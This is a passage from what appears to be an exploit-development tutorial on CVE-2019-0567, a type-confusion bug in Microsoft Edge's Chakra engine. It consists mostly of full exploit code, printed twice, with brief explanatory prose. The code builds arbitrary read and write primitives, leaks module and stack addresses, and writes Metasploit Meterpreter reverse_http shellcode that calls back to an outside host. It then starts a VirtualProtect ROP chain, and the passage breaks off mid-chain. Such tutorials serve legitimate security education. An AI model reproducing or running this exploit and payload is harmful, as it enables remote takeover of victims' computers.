write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00e28996, 0xff000000);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc48348d5, 0x74c08520);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x078b66b2, 0x85c30148);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58d275c0, 0x006a58c3);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc2c74959, 0x56a2b5f0);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0000d5ff, );
inc();

Notice at the last line, we are missing 4 bytes. We can add some NULL padding (NULL bytes don’t affect us because we aren’t dealing with C-style strings). We need to update our last line as follows:

write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0000d5ff);
inc();

Let’s take just one second to breakdown why the shellcode is formatted this way. We can see that our write primitive starts writing this shellcode to chakra_base + 0x74b000. If we take a look at this address within WinDbg we can see it is “empty”.

This address comes from the .data section of chakra.dll - meaning it is RW memory that we can write our shellcode to. As we have seen time and time again, the !dh chakra command can be used to see where the different headers are located at. Here is how our exploit looks now:

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x450 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1])

    // Arbitrary read to get the threadContext pointer (offset 0x3b8)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
    document.write("<br>");

    // Counter
    let countMe = 0;

    // Helper function for counting
    function inc()
    {
        countMe+=0x8;
    }

    // Shellcode (will be executed in JIT process)
    // msfvenom -p windows/x64/meterpreter/reverse_http LHOST=172.16.55.195 LPORT=443 -f c
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe48348fc, 0x00cce8f0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x51410000, 0x51525041);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56d23148, 0x528b4865);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4860, 0x528b4818);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc9314d20, 0x50728b48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4ab70f48, 0xc031484a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x7c613cac, 0x41202c02);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x410dc9c1, 0xede2c101);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4852, 0x8b514120);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01483c42, 0x788166d0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0f020b18, 0x00007285);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x88808b00, 0x48000000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x6774c085, 0x44d00148);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5020408b, 0x4918488b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56e3d001, 0x41c9ff48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4d88348b, 0x0148c931);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc03148d6, 0x0dc9c141);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc10141ac, 0xf175e038);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x244c034c, 0xd1394508);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4458d875, 0x4924408b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4166d001, 0x44480c8b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x491c408b, 0x8b41d001);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01488804, 0x415841d0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5a595e58, 0x59415841);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x83485a41, 0x524120ec);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4158e0ff, 0x8b485a59);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff4be912, 0x485dffff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4953db31, 0x6e6977be);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x74656e69, 0x48564100);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc749e189, 0x26774cc2);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53d5ff07, 0xe1894853);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x314d5a53, 0xc9314dc0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba495353, 0xa779563a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0ee8d5ff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x31000000, 0x312e3237);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x35352e36, 0x3539312e);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485a00, 0xc0c749c1);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000001bb, 0x53c9314d);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53036a53, 0x8957ba49);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0000c69f, 0xd5ff0000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000023e8, 0x2d652f00);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x65503754, 0x516f3242);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58643452, 0x6b47336c);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x67377674, 0x4d576c79);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x3764757a, 0x0078466a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53c18948, 0x4d58415a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4853c931, 0x280200b8);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000084, 0x53535000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xebc2c749, 0xff3b2e55);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc68948d5, 0x535f0a6a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf189485a, 0x4dc9314d);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5353c931, 0x2dc2c749);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff7b1806, 0x75c085d5);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc1c7481f, 0x00001388);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf044ba49, 0x0000e035);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xd5ff0000, 0x74cfff48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe8cceb02, 0x00000055);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x406a5953, 0xd189495a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4910e2c1, 0x1000c0c7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba490000, 0xe553a458);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x9348d5ff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485353, 0xf18948e7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x49da8948, 0x2000c0c7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89490000, 0x12ba49f9);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00e28996, 0xff000000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc48348d5, 0x74c08520);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x078b66b2, 0x85c30148);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58d275c0, 0x006a58c3);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc2c74959, 0x56a2b5f0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0000d5ff);
	inc();

    // We can reliably traverse the stack 0x6000 bytes
    // Scan the stack for the return address below
    /*
    0:020> u chakra+0xd4a73
    chakra!Js::JavascriptFunction::CallFunction<1>+0x83:
    00007fff`3a454a73 488b5c2478      mov     rbx,qword ptr [rsp+78h]
    00007fff`3a454a78 4883c440        add     rsp,40h
    00007fff`3a454a7c 5f              pop     rdi
    00007fff`3a454a7d 5e              pop     rsi
    00007fff`3a454a7e 5d              pop     rbp
    00007fff`3a454a7f c3              ret
    */

    // Creating an array to store the return address because read64() returns an array of 2 32-bit values
    var returnAddress = new Uint32Array(0x4);
    returnAddress[0] = chakraLo + 0xd4a73;
    returnAddress[1] = chakraHigh;

	// Counter variable
	let counter = 0x6000;

	// Loop
	while (counter != 0)
	{
	    // Store the contents of the stack
	    tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

	    // Did we find our target return address?
        if ((tempContents[0] == returnAddress[0]) && (tempContents[1] == returnAddress[1]))
        {
			document.write("[+] Found our return address on the stack!");
            document.write("<br>");
            document.write("[+] Target stack address: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter));
            document.write("<br>");

            // Break the loop
            break;

        }
        else
        {
        	// Decrement the counter
	    	// This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
	    	counter -= 0x8;
        }
	}

	// alert() for debugging
	alert("DEBUG");

	// Corrupt the return address to control RIP with 0x4141414141414141
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
}
</script>

As we can clearly, see, we use our write primitive to write 1 QWORD at a time our shellcode (this is why we have countMe+=0x8;. Let’s run our exploit, the same way we have been doing. When we run this exploit, an alert dialogue should occur just before the stack address is overwritten. When the alert dialogue occurs, we can debug the content process (we have already seen how to find this process via Process Hacker, so I won’t continually repeat this).

After our exploit has ran, we can then examine where our shellcode should have been written to: chakra_base + 0x74b000.

If we cross reference the disassembly here with the Metasploit Framework we can see that Metasploit staged-payloads will use the following stub to start execution.

As we can see, our injected shellcode and the Meterpreter shellcode both start with cld instruction to flush any flags and a stack alignment routine which ensure the stack is 10-byte aligned (Windows __fastcall requires this). We can now safely assume our shellcode was written properly to the .data section of chakra.dll within the content process.

Now that we have our payload, which we will execute at the end of our exploit, we can begin the exploitation process by starting with our “final” ROP chain.

VirtualProtect ROP Chain

Let me caveat this section by saying this ROP chain we are about to develop will not be executed until the end of our exploit. However, it will be a moving part of our exploit going forward so we will go ahead and “knock it out now”.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x450 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1])

    // Arbitrary read to get the threadContext pointer (offset 0x3b8)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
    document.write("<br>");

    // Counter
    let countMe = 0;

    // Helper function for counting
    function inc()
    {
        countMe+=0x8;
    }

    // Shellcode (will be executed in JIT process)
    // msfvenom -p windows/x64/meterpreter/reverse_http LHOST=172.16.55.195 LPORT=443 -f c
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe48348fc, 0x00cce8f0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x51410000, 0x51525041);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56d23148, 0x528b4865);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4860, 0x528b4818);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc9314d20, 0x50728b48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4ab70f48, 0xc031484a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x7c613cac, 0x41202c02);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x410dc9c1, 0xede2c101);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4852, 0x8b514120);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01483c42, 0x788166d0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0f020b18, 0x00007285);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x88808b00, 0x48000000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x6774c085, 0x44d00148);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5020408b, 0x4918488b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56e3d001, 0x41c9ff48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4d88348b, 0x0148c931);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc03148d6, 0x0dc9c141);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc10141ac, 0xf175e038);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x244c034c, 0xd1394508);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4458d875, 0x4924408b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4166d001, 0x44480c8b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x491c408b, 0x8b41d001);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01488804, 0x415841d0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5a595e58, 0x59415841);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x83485a41, 0x524120ec);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4158e0ff, 0x8b485a59);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff4be912, 0x485dffff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4953db31, 0x6e6977be);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x74656e69, 0x48564100);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc749e189, 0x26774cc2);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53d5ff07, 0xe1894853);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x314d5a53, 0xc9314dc0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba495353, 0xa779563a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0ee8d5ff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x31000000, 0x312e3237);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x35352e36, 0x3539312e);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485a00, 0xc0c749c1);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000001bb, 0x53c9314d);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53036a53, 0x8957ba49);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0000c69f, 0xd5ff0000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000023e8, 0x2d652f00);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x65503754, 0x516f3242);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58643452, 0x6b47336c);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x67377674, 0x4d576c79);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x3764757a, 0x0078466a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53c18948, 0x4d58415a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4853c931, 0x280200b8);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000084, 0x53535000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xebc2c749, 0xff3b2e55);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc68948d5, 0x535f0a6a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf189485a, 0x4dc9314d);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5353c931, 0x2dc2c749);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff7b1806, 0x75c085d5);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc1c7481f, 0x00001388);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf044ba49, 0x0000e035);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xd5ff0000, 0x74cfff48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe8cceb02, 0x00000055);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x406a5953, 0xd189495a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4910e2c1, 0x1000c0c7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba490000, 0xe553a458);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x9348d5ff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485353, 0xf18948e7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x49da8948, 0x2000c0c7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89490000, 0x12ba49f9);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00e28996, 0xff000000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc48348d5, 0x74c08520);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x078b66b2, 0x85c30148);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58d275c0, 0x006a58c3);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc2c74959, 0x56a2b5f0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0000d5ff);
	inc();

	// Store where our ROP chain begins
	ropBegin = countMe;

	// Increment countMe (which is the variable used to write 1 QWORD at a time) by 0x50 bytes to give us some breathing room between our shellcode and ROP chain
	countMe += 0x50;

	// VirtualProtect() ROP chain (will be called in the JIT process)
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x72E128, chakraHigh);         // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x74e030, chakraHigh);         // PDWORD lpflOldProtect (any writable address -> Eventually placed in R9)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0xf6270, chakraHigh);          // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
    inc();

    // Store the current offset within the .data section into a var
    ropoffsetOne = countMe;

    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // LPVOID lpAddress (Eventually will be updated to the address we want to mark as RWX, our shellcode)
    inc();
